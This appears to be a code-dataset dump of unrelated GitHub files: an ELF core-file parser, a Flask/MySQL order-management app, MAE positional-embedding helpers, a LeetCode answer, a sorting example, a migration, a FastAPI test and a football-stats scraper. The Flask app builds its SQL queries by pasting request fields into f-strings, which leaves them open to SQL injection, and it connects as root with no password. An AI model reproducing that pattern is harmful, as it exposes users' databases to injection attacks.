if phNoteHdr is None:\n            return None\n\n        m = self.Seek(phNoteHdr['p_offset'])\n        size = phNoteHdr['p_memsz']\n        if size == 0:\n            size = phNoteHdr['p_filesz']\n        noteContent = m.read(size)\n\n        notes = []\n        offset = 0\n        while offset < len(noteContent):\n            t = struct.unpack('3I', noteContent[offset:offset + 12])\n            n_namesz = t[0]\n            n_descsz = t[1]\n            n_type = t[2]\n            offset = offset + 12\n            name = noteContent[offset:offset + n_namesz]\n            offset = offset + roundup(n_namesz, 4)\n            desc = noteContent[offset:offset + n_descsz]\n            offset = offset + roundup(n_descsz, 4)\n            notes.append((name, desc, n_type))\n        self.Restore()\n\n        self._notes = notes\n        return notes\n\n    @staticmethod\n    def NtFiles(note):\n        o = [] \n\n        def cstr(note, offset):\n            a = note[offset:]\n            i = a.index('\\0')\n            assert i > offset\n            return a[:i]\n\n        off = 0\n        t = struct.unpack_from('2Q', note, off)\n        size = t[0]\n        #o['page_size'] = t[1]\n\n        off = 16\n\n        for i in range(size):\n            assert off < len(note)\n            t = struct.unpack_from('3Q', note, off)\n            \n            f = {}\n            f['start_addr'] = t[0]\n            f['end_addr'] = t[1]\n            f['offset'] = t[2]\n            off = off + 24\n            o.append(f)\n\n        names = note[off:].decode('utf8').split('\\0')\n\n        for i in range(size):\n            t = names[i]\n            o[i]['name'] = t\n\n        return o\n\n    @staticmethod\n    def NtSigInfo(note):\n        o = {}\n        off = 0\n        t = struct.unpack_from('2Ii', note, off)\n        o['si_signo'] = t[0]\n        o['si_code'] = t[1]\n        o['si_errno'] = t[2]\n        off = off + 16 \n\n        import signal\n        # SIGILL, SIGFPE, SIGSEGV, SIGBUS, SIGTRAP, SIGEMT\n        if o['si_signo'] == signal.SIGILL or \\\n           
o['si_signo'] == signal.SIGFPE or \\\n o['si_signo'] == signal.SIGSEGV or \\\n o['si_signo'] == signal.SIGBUS or \\\n o['si_signo'] == signal.SIGTRAP:\n t = struct.unpack_from('Q', note, off)\n o['addr'] = t[0]\n else:\n t = struct.unpack_from('3I', note, off)\n o['sender_pid'] = t[0]\n o['sender_uid'] = t[1]\n o['status'] = t[2]\n \n return o\n\n @staticmethod\n def timeval(note, off):\n t = struct.unpack_from('2Q', note, off)\n return t\n\n @staticmethod\n def NtPrStatus(note):\n o = {}\n \n off = 0\n fmt = '3Ih2x2Q4I8Q'\n t = struct.unpack_from(fmt, note, off)\n off = off + struct.calcsize(fmt) \n \n o['si_signo'] = t[0]\n o['si_code'] = t[1]\n o['si_errno'] = t[2]\n o['pr_cursig'] = t[3]\n o['pr_sigpend'] = t[4]\n o['pr_sighold'] = t[5]\n o['pr_pid'] = t[6]\n o['pr_ppid'] = t[7]\n o['pr_pgrp'] = t[8]\n o['pr_sid'] = t[9]\n o['pr_utime'] = t[10] + t[11] / 1000000.0\n o['pr_stime'] = t[12] + t[13] / 1000000.0\n o['pr_cutime'] = t[14] + t[15] / 1000000.0 \n o['pr_cstime'] = t[16] + t[17] / 1000000.0\n return o\n \n @staticmethod\n def NtPrPsInfo(note):\n o = {}\n off = 0\n fmt = 'bc2bQ2I4i16s80s'\n t = struct.unpack_from(fmt, note, off)\n o['pr_state'] = t[0]\n o['pr_sname'] = t[1].decode('utf8')\n o['pr_zomb'] = t[2]\n o['pr_nice'] = t[3]\n o['pr_flag'] = t[4]\n o['pr_uid'] = t[5]\n o['pr_gid'] = t[6]\n o['pr_pid'] = t[7]\n o['pr_ppid'] = t[8]\n o['pr_pgrp'] = t[9]\n o['pr_sid'] = t[10]\n o['pr_fname'] = t[11].decode('utf8').split('\\0')[0]\n o['pr_psargs'] = t[12].decode('utf8').split('\\0')[0]\n return o\n \n @staticmethod\n def NtGnuBuildId(note):\n return \"\".join(\"{:02x}\".format(py23.byte2int(c)) for c in note)\n\n def GetNtFiles(self):\n for (name, desc, n_type) in self.GetNotes():\n if n_type == Elf.NTYPE.NT_FILE:\n return self.NtFiles(desc)\n return None \n\n def GetNtSigInfo(self):\n for (name, desc, n_type) in self.GetNotes():\n if n_type == Elf.NTYPE.NT_SIGINFO:\n return self.NtSigInfo(desc)\n return None \n\n def GetNtPrStatus(self):\n for (name, desc, n_type) in self.GetNotes():\n if n_type == Elf.NTYPE.NT_PRSTATUS:\n return self.NtPrStatus(desc)\n return None \n\n def GetNtPrPsInfo(self):\n for (name, desc, n_type) in self.GetNotes():\n if n_type == Elf.NTYPE.NT_PRPSINFO:\n return self.NtPrPsInfo(desc)\n return None \n \n def GetBuildId(self):\n noteBuildId = None\n for (name, desc, n_type) in self.GetNotes():\n if name == b'GNU\\x00' and n_type == Elf.NTYPE.NT_GNU_BUILD_ID:\n return self.NtGnuBuildId(desc)\n return None\n\n def Load(self, filename):\n \"\"\" Load Elf file to memory\n \"\"\"\n\n # open file\n f = open(filename, 'rb')\n self._I_file = f\n self._I_offset = 0 \n\n # get file size\n f.seek(0, 2)\n size = f.tell()\n f.seek(0)\n\n # mmap\n m = mmap(f.fileno(), size, access = ACCESS_READ)\n self._I_mmap = m\n\n m.seek(0)\n magic = m.read(16)\n \n # compact py2 and py3\n if isinstance(magic, str):\n magic = [ord(i) for i in magic]\n\n if magic[0] != 127 or \\\n magic[1] != ord('E') or \\\n magic[2] != ord('L') or \\\n magic[3] != ord('F'):\n print (\"error: not a valid elf file.\")\n return\n\n # read elf header\n elfhdr = self.GetEhdr()\n\n # read section headers\n sechdrs = self.GetShdrs()\n \n # get strtab, strtab maybe not when elf is corefile \n for s in sechdrs:\n if s['sh_type'] == Elf.SHTYPE.STRTAB:\n self._strtab = Elf.StrTab(self, '.shstrtab', s['sh_offset'], s['sh_size'])\n break\n # if self._I_strtab is None:\n # raise Exception\n\n # read Program header\n proghdrs = self.GetPhdrs()\n\n def AttachV(self, vaddr):\n\n phdrs = self.GetPhdrs()\n for i in 
phdrs:\n if i['p_flags'] & 0x1 and \\\n vaddr >= i['p_vaddr'] and \\\n vaddr <= i['p_vaddr'] + i['p_memsz']:\n #print(\"0x%x %d %d\" % (i['p_vaddr'], i['p_filesz'], i['p_offset']))\n elf = Elf()\n elf.LoadOffset(self, i['p_offset'])\n return elf \n\n return None\n\n def LoadOffset(self, elf, offset=0):\n \"\"\"Attach an Elf in memory with offset as a new Elf.\n \"\"\"\n assert isinstance(elf, Elf)\n # as we didn't opened Elf file, _I_file is not saved.\n self._I_mmap = elf._I_mmap\n self._I_offset = offset\n \n #def LoadCorefileProgElf(self, filename, offset=0):\n m = self._I_mmap\n m.seek(offset)\n\n magic = m.read(16)\n \n # compact py2 and py3\n if isinstance(magic, str):\n magic = [ord(i) for i in magic]\n\n if magic[0] != 127 or \\\n magic[1] != ord('E') or \\\n magic[2] != ord('L') or \\\n magic[3] != ord('F'):\n print (\"error: not a valid elf file.\")\n return\n\n # read elf header\n elfhdr = self.GetEhdr()\n \n # read Program header\n proghdrs = self.GetPhdrs()\n \n def Unload(self):\n \"\"\"Unload Elf created by Load or Attach.\n \"\"\"\n if self._I_file:\n self._I_mmap.close()\n self._I_file.close()\n self._I_mmap = None\n self._I_file = None\n print('Elf Unloaded')\n\n @property\n def filename(self):\n if self._I_file:\n return self._I_file.name\n return None\n\n @property\n def filesize(self):\n f = self.filename\n if f:\n st = os.stat(f)\n return st.st_size\n return 0\n","repo_name":"noslate-project/andb","sub_path":"andb/loader/elf.py","file_name":"elf.py","file_ext":"py","file_size_in_byte":16784,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"76"} +{"seq_id":"74604226806","text":"from flask import Flask, render_template, request, jsonify\nimport json, datetime\n\nimport pymysql\n\nconn = pymysql.connect(\n host = \"localhost\", \n database=\"practice\",\n user= \"root\",\n password=\"\" \n)\ncursor = conn.cursor()\n\ncustomers = {}\norders = {}\norderitems = {}\ncustnorders = {\n \"customers\" : customers,\n \"orders\" : orders,\n \"ordersitems\" : orderitems\n}\n\n\ndef selectall():\n cursor.execute(\"select * from Customer\")\n data = cursor.fetchall()\n for i in data:\n customers.update({i[0] : i[1:]})\n cursor.execute(\"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID order by orderid\")\n data = cursor.fetchall()\n for i in data:\n orders.update({i[0] : i[1:]})\n custnorders.update({\"ordersize\" : len(orders)})\n cursor.execute(' select count(*) from Orders where status=\"Pending\"')\n data = cursor.fetchall()[0][0]\n custnorders.update({\"pending\" : data})\n custnorders.update({\"nonpending\" : len(orders) - data })\n cursor.execute('select * from OrderItem')\n data = cursor.fetchall()\n for i in data:\n orderitems.update({i[0] : i[1:]})\n\n\n\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n selectall()\n # print(custnorders)\n return render_template(\"index.html\",data = custnorders)\n\n@app.route(\"/addcust\", methods =[\"GET\", \"POST\"])\ndef addcustomer():\n if request.method == \"POST\":\n data = json.loads(request.data)\n name = data['name']\n gender = \"F\" if(data['gender'] == \"Female\") else \"M\"\n phone = data['phone']\n address = data['address']\n action = data['action']\n if(action == 'add'):\n query = f'insert into Customer(name, gender, phone, address) values(\"{name}\", \"{gender}\",\"{phone}\", \"{address}\");'\n cursor.execute(query)\n conn.commit()\n 
elif(action == 'update'):\n query = f\"update Customer set name='{name}', address = '{address}', gender='{gender}' ,phone='{phone}' where custid = {data['custid']};\"\n cursor.execute(query)\n conn.commit()\n print(data)\n return jsonify(data)\n return \"FORBIDDEN\"\n\n@app.route(\"/addorder\", methods =[\"GET\", \"POST\"])\ndef addorder():\n if request.method == \"POST\":\n data = json.loads(request.data)\n custid = data['custid']\n orderitemid = data['orderitemid']\n qtyorderitem = data['qtyorderitem']\n info = checkqty(qtyorderitem, orderitemid)\n print(info)\n if(info[0] > 0):\n d = datetime.datetime.now()\n print(int(qtyorderitem)*info[1])\n datenew = str(d.year)+\"-\"+str(d.month)+\"-\"+str(d.day)\n query = f'insert into Orders(quantity, custid, orderitemid, orderedOn, amount) values({qtyorderitem}, {custid}, {orderitemid},\"{datenew}\", {int(qtyorderitem)*info[1]})'\n cursor.execute(query)\n conn.commit()\n print(\"updated stock \",info)\n query = f'update OrderItem set stock = {info[0]} where orderitemID = {orderitemid}'\n cursor.execute(query)\n conn.commit()\n return jsonify({\"msg\" : \"QE\"}) # query executed\n return jsonify({\"msg\" : \"SE\"}) # stock exceeded\n return \"FORBIDDEN\"\n \n\ndef checkqty(qty,item):\n cursor.execute(f\"select stock, price from OrderItem where orderitemID = {item}\")\n data = cursor.fetchall()\n return [(int(data[0][0]) - int(qty)), int(data[0][1]) ]\n # return True if int(qty) < int(data) else False\n\n\n@app.route('/searchcust', methods =[\"GET\", \"POST\"])\ndef searchcustomer():\n if request.method == \"POST\":\n data = json.loads(request.data)['words']\n cursor.execute(f\"select * from Customer where name like '%{data}%'\")\n data = cursor.fetchall()\n return jsonify({\"msg\" : data})\n\n@app.route('/searchorder', methods =[\"GET\", \"POST\"])\ndef searchorder():\n if request.method == \"POST\":\n data = json.loads(request.data)['words']\n cursor.execute(f\"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID and name like '%{data}%'\")\n data = list(cursor.fetchall())\n data = strdate(data)\n\n return jsonify({\"msg\" : data})\n\n\ndef strdate(data) :\n newlist = []\n for i in data:\n newlist.append(list(i))\n for i in newlist:\n str_ = \"0\" if i[3].month >=1 and i[3].month <=9 else \"\"\n i[3] = str(i[3].year)+\"-\"+str_+str(i[3].month)+\"-\"+str(i[3].day)\n return newlist\n\n@app.route(\"/getpendingntotal\", methods =[\"GET\", \"POST\"])\ndef getpending():\n if request.method == \"POST\":\n data = json.loads(request.data)['whatwewant']\n query = \"\"\n if data == \"Pending\" or data == \"Completed\" : \n query = f'select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID and status = \"{data}\";'\n else :\n query = f'select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID order by orderid;'\n\n cursor.execute(query)\n data = cursor.fetchall()\n data = strdate(data)\n return jsonify({\"msg\" : data})\n\n\n@app.route(\"/orderbyname\", methods =[\"GET\", \"POST\"])\ndef orderbyname():\n if request.method == \"POST\":\n data = json.loads(request.data)\n query = \"\"\n if(data['words'] == 'orderbyname'):\n query = \"select * from Customer order by name\"\n elif(data['words'] 
== 'orderbyinitially'):\n query = \"select * from Customer\"\n cursor.execute(query)\n data = cursor.fetchall()\n return jsonify({\"msg\" : data})\n\n\n@app.route(\"/orderbydate\", methods =[\"GET\", \"POST\"])\ndef orderbydate():\n if request.method == \"POST\":\n data = json.loads(request.data)\n query = \"\"\n if(data['words'] == \"orderbydate\"):\n query = \"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID order by orderedOn\"\n elif(data['words'] == 'orderbyinitially'):\n query = \"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID\"\n elif(data['words'] == 'orderbynameinorderstable'):\n query = \"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID order by name\"\n cursor.execute(query)\n data = cursor.fetchall()\n data = strdate(data)\n return jsonify({\"msg\" : data})\n\n\n@app.route(\"/updatecustomer\", methods =[\"GET\", \"POST\"])\ndef updatecust():\n if request.method == \"POST\":\n data = json.loads(request.data)\n\n\n@app.route(\"/getcustbyid\", methods =[\"GET\", \"POST\"])\ndef getcustbyid():\n if request.method == \"POST\":\n data = json.loads(request.data)\n query = f\"select * from Customer where custid={data['id']}\"\n cursor.execute(query)\n data = cursor.fetchall()\n return jsonify({\"msg\" :data})\n\n@app.route(\"/updatependingorder\", methods =[\"GET\", \"POST\"])\ndef updatependingorder():\n if request.method == \"POST\":\n data = json.loads(request.data)\n orderid = data['orderid']\n query = f'update Orders set status=\"Completed\" where orderid = {orderid}'\n cursor.execute(query)\n conn.commit()\n return {\"msg\" : \"updated\"}\n\n\n@app.route(\"/deleteorder\", methods =[\"GET\", \"POST\"])\ndef deleteorder():\n if request.method == \"POST\":\n data = json.loads(request.data)\n orderid = data['orderid']\n print(orderid)\n query = f'delete from Orders where orderid = {orderid}'\n cursor.execute(query)\n conn.commit()\n return {\"msg\" : \"deleted\"}\n\n'''\n\n create table Customer (\n custid int primary key auto_increment,\n name varchar(50) not null,\n gender varchar(1) not null,\n phone varchar(10) not null,\n address varchar(100) not null default \"Pune\"\n );\n\n create table OrderItem (\n orderitemID int primary key auto_increment, \n OrderItemName varchar(50), \n stock int check (stock > 0) ,\n price int\n );\n\n create table Orders( \n orderid int primary key auto_increment, \n quantity int, \n custid int, \n orderitemid int,\n status varchar(30) default \"Pending\", \n orderedOn date, \n amount int, \n foreign key(custid) references Customer(custid),\n foreign key(orderitemid) references OrderItem(orderitemID)\n );\n\n insert into OrderItem(OrderItemName, stock, price) values\n (\"Samsung TV\", 300, 40000), \n (\"Samsung G M30S\", 780, 14500),\n (\"Realme 5G\", 400, 19500),\n (\"Lenovo Ideapad 330\", 170, 42040),\n (\"Xiomi TV\", 900,25000);\n\n'''","repo_name":"parimalmahindrakar/flask","sub_path":"FlaskApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9409821026","text":"# adapted from 
https://github.com/facebookresearch/mae/blob/main/util/pos_embed.py\nimport logging\nimport math\n\nimport einops\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\n\n# --------------------------------------------------------\n# 2D sine-cosine position embedding\n# References:\n# Transformer: https://github.com/tensorflow/models/blob/master/official/nlp/transformer/model_utils.py\n# MoCo v3: https://github.com/facebookresearch/moco-v3\n# --------------------------------------------------------\ndef get_2d_sincos_pos_embed(embed_dim, h_seqlen, w_seqlen):\n \"\"\"\n grid_size: int of the grid height and width\n return:\n pos_embed: [grid_size*grid_size, embed_dim] or [1+grid_size*grid_size, embed_dim] (w/ or w/o cls_token)\n \"\"\"\n grid_h = np.arange(h_seqlen, dtype=float)\n grid_w = np.arange(w_seqlen, dtype=float)\n grid = np.meshgrid(grid_w, grid_h) # here w goes first\n grid = np.stack(grid, axis=0)\n\n grid = grid.reshape([2, 1, h_seqlen, w_seqlen])\n pos_embed = get_2d_sincos_pos_embed_from_grid(embed_dim, grid)\n return pos_embed\n\n\ndef get_2d_sincos_pos_embed_from_grid(embed_dim, grid):\n assert embed_dim % 2 == 0\n\n # use half of dimensions to encode grid_h\n emb_h = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[0]) # (H*W, D/2)\n emb_w = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[1]) # (H*W, D/2)\n\n emb = np.concatenate([emb_h, emb_w], axis=1) # (H*W, D)\n return emb\n\n\ndef get_1d_sincos_pos_embed_continuous(x, embed_dim: int):\n \"\"\" https://github.com/lucidrains/denoising-diffusion-pytorch/blob/main/denoising_diffusion_pytorch/denoising_diffusion_pytorch.py \"\"\"\n assert x.ndim == 1\n half_dim = embed_dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, device=x.device) * -emb)\n emb = torch.einsum(\"m,d->md\", x, emb)\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\n\ndef get_1d_sincos_pos_embed(embed_dim, seqlen):\n grid = np.arange(seqlen, dtype=float)\n pos_embed = get_1d_sincos_pos_embed_from_grid(embed_dim, grid)\n return pos_embed\n\n\ndef get_1d_sincos_pos_embed_from_grid(embed_dim, pos):\n \"\"\"\n embed_dim: output dimension for each position\n pos: a list of positions to be encoded: size (M,)\n out: (M, D)\n \"\"\"\n assert embed_dim % 2 == 0\n omega = np.arange(embed_dim // 2, dtype=float)\n omega /= embed_dim / 2.\n omega = 1. 
/ 10000 ** omega # (D/2,)\n\n pos = pos.reshape(-1) # (M,)\n out = np.einsum('m,d->md', pos, omega) # (M, D/2), outer product\n\n emb_sin = np.sin(out) # (M, D/2)\n emb_cos = np.cos(out) # (M, D/2)\n\n emb = np.concatenate([emb_sin, emb_cos], axis=1) # (M, D)\n return emb\n\n\n# --------------------------------------------------------\n# Interpolate position embeddings for high-resolution\n# References:\n# DeiT: https://github.com/facebookresearch/deit\n# --------------------------------------------------------\ndef interpolate_pos_embed_permanent(model, old_pos_embed):\n assert model.patch_embed.patch_size[0] == model.patch_embed.patch_size[1], \"only square patchsizes supported\"\n _, img_h, img_w = model.input_shape\n assert img_h == img_w, \"only square patchsizes supported\"\n\n _, old_n_patches, dim = old_pos_embed.shape\n new_n_patches = model.patch_embed.num_patches\n\n old_size = int(old_n_patches ** 0.5)\n new_size = int(new_n_patches ** 0.5)\n\n if old_size == new_size:\n return old_pos_embed\n\n logging.info(f\"position embedding interpolated from {old_size}x{old_size} to {new_size}x{new_size}\")\n # aux_tokens are kept unchanged\n new_pos_embed = F.interpolate(\n einops.rearrange(old_pos_embed, \"1 (h w) dim -> 1 dim h w\", h=old_size, w=old_size),\n size=(new_size, new_size),\n mode='bicubic',\n )\n new_pos_embed = einops.rearrange(new_pos_embed, \"1 dim h w -> 1 (h w) dim\")\n return new_pos_embed\n\n\n# interpolate positional embedding only for the current forward pass\ndef interpolate_pos_embed_temporary(old_pos_embed, old_token_h, old_token_w, new_token_h, new_token_w):\n new_pos_embed = F.interpolate(\n einops.rearrange(old_pos_embed, \"1 (h w) dim -> 1 dim h w\", h=old_token_h, w=old_token_w),\n size=(new_token_h, new_token_w),\n mode='bicubic',\n )\n new_pos_embed = einops.rearrange(new_pos_embed, \"1 dim h w -> 1 (h w) dim\")\n return new_pos_embed\n","repo_name":"ml-jku/MAE-CT","sub_path":"utils/positional_embedding.py","file_name":"positional_embedding.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"76"} +{"seq_id":"72056529846","text":"from collections import Counter\n\nT = int(input())\nfor _ in range(T):\n W = input()\n K = int(input())\n min_ans, max_ans = float('inf'), 0\n str_dict = Counter(W)\n for key, val in str_dict.items():\n if val < K:\n continue\n index = [i for i, c in enumerate(W) if c == key]\n idx_val = [index[i+K-1] - index[i] + 1 for i in range(len(index) + 1 - K)]\n if min(idx_val) < min_ans:\n min_ans = min(idx_val)\n if max(idx_val) > max_ans:\n max_ans = max(idx_val)\n if min_ans == float('inf') and max_ans == 0:\n print(-1)\n else:\n print(min_ans, max_ans)\n","repo_name":"Algorithm-Study/Algorithm","sub_path":"implementation/B20437_이영섭.py","file_name":"B20437_이영섭.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"2019384963","text":"class Solution:\n def isMajorityElement(self, nums: List[int], target: int) -> bool:\n \n array = []\n for num in nums:\n if target == num:\n array.append(num)\n \n if len(array) > len(nums) / 2:\n return True\n else:\n return False\n \n \n","repo_name":"twyunting/Algorithms-LeetCode","sub_path":"Easy/Array/1150. Check If a Number Is Majority Element in a Sorted Array.py","file_name":"1150. 
Check If a Number Is Majority Element in a Sorted Array.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44728759756","text":"from Figure import Point\n\n\nclass Renderer(object):\n\n def __init__(self, screen_mat):\n \"\"\"\n 注意: transformed()が定義されていないFigureに対してrender_functionを設定することはできない\n \"\"\"\n self.screen_mat = screen_mat\n self.render_functions = {Point: lambda self, p: print(\"rendered: \" + str(p))}\n\n def render(self, figure):\n \"\"\" figureの座標を変換して描画関数に渡す \"\"\"\n if self.render_functions.get(type(figure)):\n # Figure.transformedはここでのみ使われる\n self.render_functions[type(figure)](figure.transformed(figure.mat * self.screen_mat))\n else:\n for sub_figure in figure:\n self.render(sub_figure)\n","repo_name":"yuki67/Figure","sub_path":"Renderer.py","file_name":"Renderer.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32567164841","text":"from authenticator import authenticator, MyAuthenticator\nfrom fastapi.testclient import TestClient\nfrom main import app\nfrom queries.countries import CountryRepository, CountriesOut\nfrom typing import List\n\nclient = TestClient(app)\n\n\nclass MockUpdateCountryRepo(CountryRepository):\n def get_all_countries(self) -> List[CountriesOut]:\n result = [\n {\n \"country_id\": 1,\n \"country_name\": \"Canada\"\n },\n {\n \"country_id\": 2,\n \"country_name\": \"Mexico\"\n },\n {\n \"country_id\": 3,\n \"country_name\": \"USA\"\n },\n {\n \"country_id\": 4,\n \"country_name\": \"France\"\n }\n ]\n\n return result\n\n\nclass MockAuthenticator(MyAuthenticator):\n def try_get_current_account_data(self):\n mock_account_data = {\n \"access_token\": \"mock_access_token\",\n \"type\": \"Bearer\",\n \"user\": \"user\",\n }\n return mock_account_data\n\n\ndef get_fake_account_data():\n return {}\n\n\ndef test_get_all_countries():\n app.dependency_overrides[CountryRepository] = MockUpdateCountryRepo\n current_account_data = authenticator.get_current_account_data\n app.dependency_overrides[current_account_data] = get_fake_account_data\n\n json = [\n {\n \"country_id\": 1,\n \"country_name\": \"Canada\"\n },\n {\n \"country_id\": 2,\n \"country_name\": \"Mexico\"\n },\n {\n \"country_id\": 3,\n \"country_name\": \"USA\"\n },\n {\n \"country_id\": 4,\n \"country_name\": \"France\"\n }\n ]\n\n expected = [\n {\n \"country_id\": 1,\n \"country_name\": \"Canada\"\n },\n {\n \"country_id\": 2,\n \"country_name\": \"Mexico\"\n },\n {\n \"country_id\": 3,\n \"country_name\": \"USA\"\n },\n {\n \"country_id\": 4,\n \"country_name\": \"France\"\n }\n ]\n\n response = client.get(\"/countries/\", json=json)\n print(response.json())\n\n assert response.status_code == 200\n assert response.json() == expected\n","repo_name":"agebrese/voy-amie","sub_path":"api/tests/test_country.py","file_name":"test_country.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10513716321","text":"\"\"\"\n1662. 
Check If Two String Arrays are Equivalent\nhttps://leetcode.com/problems/check-if-two-string-arrays-are-equivalent/\n\"\"\"\n\n\nclass Solution:\n    def arrayStringsAreEqual(self, word1: List[str], word2: List[str]) -> bool:\n        word1_str = \"\"\n        word2_str = \"\"\n        longest_arr = max(len(word1), len(word2))\n        for i in range(longest_arr):\n            if i < len(word1):\n                word1_str += word1[i]\n            if i < len(word2):\n                word2_str += word2[i]\n        return word1_str == word2_str\n","repo_name":"pmbechard/CodingChallenges","sub_path":"LeetCode/Python/easy/check_if_two_string_arrays_are_equivalent_1662.py","file_name":"check_if_two_string_arrays_are_equivalent_1662.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"}
{"seq_id":"28764567320","text":"\"\"\"\r\nSelection Sort\r\n\r\n1) find the index of the minimum value in the current list\r\n2) swap that value with the value at the first unsorted position (no swap is needed\r\n   if the minimum element is already at that position)\r\n3) now sort the tail of the list, excluding the already sorted elements\r\n\r\nThe algorithm's complexity is O(N^2), where N is the number of elements.\r\nNot a stable sort.\r\n\"\"\"\r\n\r\n\r\ndef selection_sort(arr):\r\n    for i in range(len(arr)):\r\n        idx_min = i\r\n        for j in range(i + 1, len(arr)):\r\n            if arr[j] < arr[idx_min]:\r\n                idx_min = j\r\n        arr[idx_min], arr[i] = arr[i], arr[idx_min]\r\n        print(arr)\r\n\r\n\r\narray = [8, 9, 4, 1, 0, 3, 7, 6, 2, 5]\r\nselection_sort(array)\r\nprint(array)\r\n\r\n\r\n\r\n#########\r\ndef select_sort(a):\r\n    for i in range(len(a)-1):\r\n        for k in range(i+1, len(a)):\r\n            if a[k] < a[i]:\r\n                a[k], a[i] = a[i], a[k]","repo_name":"bostspb/algorithms","sub_path":"implementation/sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"10311350244","text":"\"\"\"empty message\n\nRevision ID: 49cc085ef589\nRevises: 92252e237959\nCreate Date: 2019-09-23 10:30:25.926109\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '49cc085ef589'\ndown_revision = '92252e237959'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('admins',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('id')\n    )\n    op.add_column('users', sa.Column('admin_id', sa.Integer(), nullable=True))\n    op.create_foreign_key(None, 'users', 'admins', ['admin_id'], ['id'])\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'users', type_='foreignkey')\n op.drop_column('users', 'admin_id')\n op.drop_table('admins')\n # ### end Alembic commands ###\n","repo_name":"vnyabzya/AdminPanelStopDrugsBot","sub_path":"migrations/versions/49cc085ef589_.py","file_name":"49cc085ef589_.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22409888859","text":"from django.urls import path\nfrom django.views.decorators.cache import cache_page\n\nfrom .views import *\n\nurlpatterns = [\n # path(\"add/\", addNoteView, name='add_note'),\n path(\"\", PointPage.as_view(), name='index'),\n path('category/', PointCategory.as_view(), name='category'),\n path(\"users-points/\", UsersPointPage.as_view(), name='users_points'),\n path(\"new-point/\", CreatePoint.as_view(), name='add_point'),\n path(\"point-info/\", ShowPoint.as_view(), name='point_info'),\n path(\"point/-update\", UpdatePoint.as_view(), name='point_update'),\n path(\"point/-delete\", delete_point, name='point_delete'),\n path(\"about/\", about, name='about'),\n path(\"contact/\", contact, name='contact'),\n # path('map/', location_map, name='location_map'),\n]\n","repo_name":"Agipas/help_map","sub_path":"kartadopomogu/karta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71386418164","text":"from init import session\nimport csv\n\nresponse = session.get(\"https://www.transfermarkt.com.mt/sir-alex-ferguson/eingesetzteSpieler/trainer/4/plus/1?saison_id=&verein_id=985&liga=&wettbewerb_id=GB1\")\n\nwith open(\"most_players_stats.csv\", \"w\", newline=\"\") as file:\n csv_writer = csv.writer(file)\n csv_writer.writerow(['Name', 'Appearances', 'Goals', 'Assists'])\n\nitems = response.html.find(\"table.items\", first=True)\n\nodd_items = items.find(\"tr.odd\")\neven_items = items.find(\"tr.even\")\n\nfor i in range(12):\n odd_item = odd_items[i]\n table_rows = odd_item.find(\"td\")\n odd_name = table_rows[2].find(\"a\", first=True).text\n odd_appearances = table_rows[8].find(\"a\", first=True).text\n odd_goals = table_rows[11].text\n odd_assists = table_rows[12].text\n print(odd_name, odd_appearances, odd_goals, odd_assists)\n\n even_item = even_items[i]\n table_rows = even_item.find(\"td\")\n even_name = table_rows[2].find(\"a\", first=True).text\n even_appearances = table_rows[8].find(\"a\", first=True).text\n even_goals = table_rows[11].text\n even_assists = table_rows[12].text\n print(even_name, even_appearances, even_goals, 